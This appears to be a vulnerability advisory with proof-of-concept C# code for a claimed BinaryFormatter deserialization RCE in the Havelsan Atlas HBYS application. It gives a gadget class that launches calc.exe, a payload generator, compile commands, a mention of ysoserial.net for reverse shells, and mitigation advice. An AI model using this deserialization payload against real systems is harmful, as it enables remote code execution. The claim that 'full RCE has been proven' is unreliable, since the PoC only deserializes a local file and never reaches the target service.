Atlas (Havelsan) Insecure Deserialization

# Exploit Title: Havelsan Atlas HBYS - Insecure Deserialization RCE
    # Date: 2025-04-14
    # Exploit Author: Ahmet Ümit BAYRAM
    # Vendor: https://github.com/havelsan/atlas
    # Version: latest
    # Tested on: Windows 10 - 64bit
    # CVE: N/A
    
    ## 🔍 Havelsan Atlas HBYS (.NET BinaryFormatter Deserialization RCE
    Vulnerability Analysis)
    
    ### 📌 Application:
    - **Project Name**: Havelsan Atlas HBYS – [
    https://github.com/havelsan/atlas](https://github.com/havelsan/atlas)
    - **Technology**: C# / ASP.NET / .NET Framework
    - **Vulnerability Type**: Insecure Deserialization (BinaryFormatter)
    - **Affected Class**: `TTObjectClasses.HSBSServis+WebMethods`
    - **Vulnerable File**: `HSBSServis.hvl.cs`
    - **Vulnerable Method**: `AHB_STOK_GIRISI_GETIRSync`
    
    ---
    
    ### 1️⃣ Vulnerability Discovery
    
    ```csharp
    public static AHB_STOK_GIRIS_LISTESI AHB_STOK_GIRISI_GETIRSync(Guid siteID,
    USER user, DateTime Tarih, bool TarihSpecified)
    {
        return (AHB_STOK_GIRIS_LISTESI) TTMessageFactory.SyncCall(
            siteID,
            new Guid("..."),
            ...,
            "TTObjectClasses.HSBSServis+WebMethods, TTObjectClasses",
            "AHB_STOK_GIRISI_GETIRSync_ServerSide",
            user, Tarih, TarihSpecified
        );
    }
    ```
    
    > 🧨 The `user` parameter is passed to the `SyncCall(...)` method, which
    internally performs deserialization using **BinaryFormatter**. This allows
    arbitrary objects to be loaded and executed, leading to **Remote Code
    Execution (RCE)**.
    
    ---
    
    ### 2️⃣ Root Cause of the Vulnerability
    
    `.NET BinaryFormatter` accepts any object that has the same class and
    namespace name, even if it originates from a different assembly.
    Additionally:
    - The deserialization process does not enforce type safety.
    - If the attacker’s class implements `IObjectReference`, its
    `GetRealObject()` method is **automatically invoked** during
    deserialization.
    
    ---
    
    ### 3️⃣ PoC Source Code
    
    ---
    
    #### 🔥 3.1 Exploit Class (`USER.cs`)
    ```csharp
    using System;
    using System.Diagnostics;
    using System.Runtime.Serialization;
    
    [Serializable]
    public class USER : IObjectReference
    {
        public object GetRealObject(StreamingContext context)
        {
            Console.WriteLine("[!] Exploit triggered!");
            Process.Start("calc.exe"); // Code execution occurs here
            return this;
        }
    }
    ```
    
    ---
    
    #### ⚙️ 3.2 Payload Generator (`GeneratePayload.cs`)
    ```csharp
    using System;
    using System.IO;
    using System.Runtime.Serialization.Formatters.Binary;
    
    public class GeneratePayload
    {
        public static void Main(string[] args)
        {
            USER user = new USER();
            using (FileStream fs = new FileStream("payload.bin",
    FileMode.Create))
            {
                BinaryFormatter bf = new BinaryFormatter();
                bf.Serialize(fs, user);
                Console.WriteLine("[+] payload.bin has been created.");
            }
        }
    }
    ```
    
    ---
    
    #### 🧪 3.3 Deserialization Trigger (`TestDeserialize.cs`)
    ```csharp
    using System;
    using System.IO;
    using System.Runtime.Serialization.Formatters.Binary;
    
    public class TestDeserialize
    {
        public static void Main(string[] args)
        {
            Console.WriteLine("[*] Reading payload.bin...");
            using (FileStream fs = new FileStream("payload.bin", FileMode.Open))
            {
                BinaryFormatter bf = new BinaryFormatter();
                var user = (USER)bf.Deserialize(fs); // ← Trigger occurs here
                Console.WriteLine("[+] Deserialization completed
    successfully!");
            }
        }
    }
    ```
    
    ---
    
    ### 4️⃣ Compilation and Exploitation Commands
    
    #### 🔧 1. Compile the malicious class as a DLL:
    ```bash
    csc /target:library /out:ExploitLib.dll USER.cs
    ```
    
    #### 🔧 2. Generate the payload:
    ```bash
    csc /reference:ExploitLib.dll /out:GeneratePayload.exe GeneratePayload.cs
    GeneratePayload.exe
    ```
    
    #### 🔧 3. Trigger deserialization:
    ```bash
    csc /reference:ExploitLib.dll /out:TestDeserialize.exe TestDeserialize.cs
    TestDeserialize.exe
    ```
    
    ✅ If everything works correctly → **`calc.exe` should be executed**
    ✅ This demonstrates a **full Remote Code Execution** scenario.
    
    ---
    
    ### 💥 How the Vulnerability Was Confirmed
    
    - The `SyncCall(...)` method deserializes the `USER` object coming from an
    untrusted source.
    - An attacker can craft a fake `USER` class with the same name and
    namespace.
    - Upon deserialization, the `IObjectReference.GetRealObject()` method is
    automatically executed.
    - Arbitrary code (e.g., `calc.exe`) was successfully launched.
    - Therefore, **full RCE has been proven**.
    
    ---
    
    ### 🔐 Mitigation Recommendations
    
    - Avoid using `BinaryFormatter` completely.
    - Instead, use safer alternatives such as:
      - `System.Text.Json`
      - `DataContractSerializer`
      - `XmlSerializer`
    - Implement strict type whitelisting for deserialization.
    - Avoid using runtime loading APIs like `Assembly.Load`,
    `Activator.CreateInstance`, and `MethodInfo.Invoke` on user-supplied data.
    
    ---
    
    ### 🧪 Additional Notes
    
    - This vulnerability can be further exploited using `ysoserial.net` to
    execute PowerShell, reverse shells, or establish persistence.
    - Similar insecure deserialization issues are common in SOAP/WCF and
    internal service bus implementations in enterprise .NET environments.
    
    ---